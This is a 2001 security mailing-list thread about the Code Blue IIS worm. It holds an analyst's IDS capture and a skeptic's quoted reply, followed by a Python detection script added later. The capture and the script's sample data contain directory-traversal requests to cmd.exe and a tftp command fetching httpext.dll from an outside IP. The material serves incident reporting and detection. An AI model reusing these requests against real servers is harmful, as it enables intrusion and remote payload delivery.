Security Incidents mailing list archives

RE: Any one seen any evidence of "Code Blue?"


From: "Patrick Belcher, Monitored Security" <pat.belcher () monitoredsecurity com>
Date: Wed, 12 Sep 2001 16:35:17 -0000

Actually, Code Blue is in the wild, and has been seen both in the UK and
the US.  At this point, our SOC has only seen probes and attempts to
infect, but we have not seen any successful attacks as yet.  This
may be because this worm targets the unicode vulnerability rather than a
newer and unpatched vulnerability.
Also, its scanning ability seems very slow and does not cross many
netblocks as yet, but we do have confirmation that it is indeed
beginning to bleed over into other networks.  Right now all source
attacks have been from the APNIC area of the world.
Below is a copy of session data captured by a Dragon IDS.  Within the
data you will see the unique directory traversal attempt with the multi
dot-dot and the tftp attempt to download the httpext.dll file which may
be the vbs script that launches the scan.

GET /{A}
/............/winnt/system32/cmd.exe?/c+dir{D}{A}
GET /{A}
/............/winnt/system32/cmd.exe?/c+dir{D}{A}
{A}
HTTP/1.1 200 OK{D}{A}
Server: Microsoft-IIS/5.0{D}{A}
Date: Tue, 11 Sep 2001 15:08:05 GMT{D}{A}
{D}{A}
< html > {D}{A}
< head > {D}{A}
var currentImage ="menu0";{D}{A}
{D}{A}
if (document.images) {{D}{A}
{D}{A}
menu0Off = new Image();{D}{A}
menu0Off.src = path + "";{D}{A}
menu0Hi = new Image();{D}{A}
menu0Hi.src = path + ""; {D}{A}
{9}{9}{D}{A}
{9}{9}menu1Off = new Image();{D}{A}
{D}{A}
< html > {D}{A}
< head > {D}{A}
< title > 
{D}{A}
GET /{A}
/............/winnt/system32/cmd.exe?/c+tftp+-i+165.194.27.107+get+httpe
xt.dll{D}{A}
GET /{A}
/............/winnt/system32/cmd.exe?/c+tftp+-i+165.194.27.107+get+httpe
xt.dll{D}{A}
{A}
HTTP/1.1 200 OK{D}{A}
Server: Microsoft-IIS/5.0{D}{A}
Date: Tue, 11 Sep 2001 15:08:09 GMT{D}{A}


The whois information for the IP that hosts the httpext.dll is Korean-
Chungang University (NET-CAU-NET)
   Chungang University Computing Center
   Huksok-dong 221, Tongjak-ku, Seoul, 156-756
   KR



-----Original Message-----
From: Nick FitzGerald [mailto:nick () virus-l demon co uk]
Sent: Wednesday, September 12, 2001 3:57 PM
To: Lists - incidents
Subject: Re: Any one seen any evidence of "Code Blue?"


Michael Katz <mike () responsible com> wrote:

Why have I not seen anything on this list about the "Code Blue" worm?
...

Because it is hype and does not exist in the wild, or if it does, it 
is so buggy/flawed that it is effectively non-viable in "real world" 
infestations.

...  I 
have received some alerts and news stories about a "Code Blue" worm:

Ignore the hype -- here are some real facts:

1.  CodeRed.C (aka CodeRedII) had compromised perhaps 200,000 
machines within less than 12 hours of its release.  That is, it 
(almost) saturated the population of non-patched, Internet-accessible 
IIS machines in about half the time CodeRed.B did (although CodeRed.B 
hit more machines total because news of its earlier spread alerted 
some system admins to patch their potentially vulnerable machines).

2.  In the days following CodeRed.C's release, I regularly captured
samples with a trivial "worm catcher" (netcat listening on port 80)
in less than an hour of going on-line with a dial-up connection.  I
did this consistently from a United Airlines lounge in Chicago, on
several different ISPs in Los Angeles, 2 or 3 different ISPs in
Dallas, again back in LA and have consistently caught around 100
CodeRed.C and CodeRed.D samples per day since returning to New
Zealand (pro-rated for hours on-line).

3.  I caught one of the first samples of CodeRed.D and apparently did
so within a few hours of its release.  I now see dozens and dozens a
day -- roughly half of my daily CodeRed catches are the .D variant.  
Thus, I would expect to have seen at least one sample of something 
that is "worse than CodeRed" as CodeRed.D spreads about the same or 
slightly less successfully than CodeRed.C.

4.  CodeBlue (aka BlueCode) is repeatedly said to be "potentially
much worse" than CodeRed.C with "the potential to spread much
faster".  Some (snake-oilers) drop the "potentially" when repeating 
those claims about this reputed new "super worm"...

5.  It is now 5 (? 6??) days since CodeBlue was reputedly released
yet my "worm catcher" (I've been using something more sophisticated
than the netcat-based one since returning to LA from Dallas and 
before returning home) has not caught a single sample of CodeBlue.

6.  Despite claims (by the snake-oilers) that CodeBlue is rampant -- 
and thus should be "killing" huge numbers of CodeReds *and* be
"inoculating" those machines from further CodeRed (re-)infestation -- 
neither my worm catcher nor any of the others in the network of worm 
catchers it is part of has seen any CodeBlue *and* those worm 
catchers are still seeing similar levels of CodeRed.C and .D each 
day.  In fact, the CodeRed capture rate has remained fairly 
consistent with that seen prior to the first mention of BlueCode.

My conclusion -- CodeBlue is vendor snake-oil and/or media hype.

[To the journalists who will write asking for a quote if this is 
posted to the list, you may  use "CodeBlue is vendor snake-oil and/or 
media hype" without seeking further quoting permission.]


Regards,

Nick FitzGerald
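
A detection sketch for the probe pattern in Patrick Belcher's Dragon capture above, as an added example (not code from either poster, nor from Dragon IDS): it decodes the {A}/{D}/{9} escapes, which are assumed here to stand for line feed, carriage return and tab, then flags the repeated-dot traversal to cmd.exe and pulls the tftp server and filename out of the second-stage request. The sample capture is constructed from the request lines quoted in that message.

```python
import re
from urllib.parse import unquote

# Constructed sample in the escaped form the Dragon capture above uses.
# The tftp host and file name are the ones shown in that capture.
SAMPLE_CAPTURE = (
    "GET /............/winnt/system32/cmd.exe?/c+dir{D}{A}"
    "HTTP/1.1 200 OK{D}{A}"
    "GET /............/winnt/system32/cmd.exe?/c+tftp+-i+165.194.27.107+get+httpext.dll{D}{A}"
    "GET /index.html HTTP/1.1{D}{A}"
    "GET /scripts/..%2e/winnt/system32/cmd.exe?/c+dir{D}{A}"
)

# One or more runs of two-plus dots leading to cmd.exe, command after "?/c+"
# (slash or backslash accepted, since IIS treats both as separators).
TRAVERSAL_RE = re.compile(
    r"(?:[/\\]\.{2,})+[/\\]winnt[/\\]system32[/\\]cmd\.exe\?/c\+(?P<cmd>\S+)", re.I)
# "tftp -i <host> get <file>" with '+' standing in for spaces in the query string
TFTP_RE = re.compile(r"tftp\+-i\+(?P<host>[\w.\-]+)\+get\+(?P<file>[\w.\-]+)", re.I)


def decode_dragon(capture):
    """Replace Dragon IDS {D}/{A}/{9} escapes with CR, LF and tab (assumed meaning)."""
    return capture.replace("{D}", "\r").replace("{A}", "\n").replace("{9}", "\t")


def classify_request(line):
    """Return a finding dict for a traversal/tftp probe line, or None if benign."""
    decoded = unquote(line)  # also exposes %2e-encoded dots before matching
    m = TRAVERSAL_RE.search(decoded)
    if not m:
        return None
    finding = {"stage": "traversal_probe", "cmd": m.group("cmd")}
    t = TFTP_RE.search(m.group("cmd"))
    if t:  # second stage: the worm pulling its payload via tftp
        finding.update(stage="tftp_download", host=t.group("host"), file=t.group("file"))
    return finding


def scan_capture(capture):
    """Decode a Dragon-style capture and return findings in the order they occur."""
    findings = []
    for raw in decode_dragon(capture).splitlines():
        hit = classify_request(raw.strip())
        if hit:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in scan_capture(SAMPLE_CAPTURE):
        print(f)
```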

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

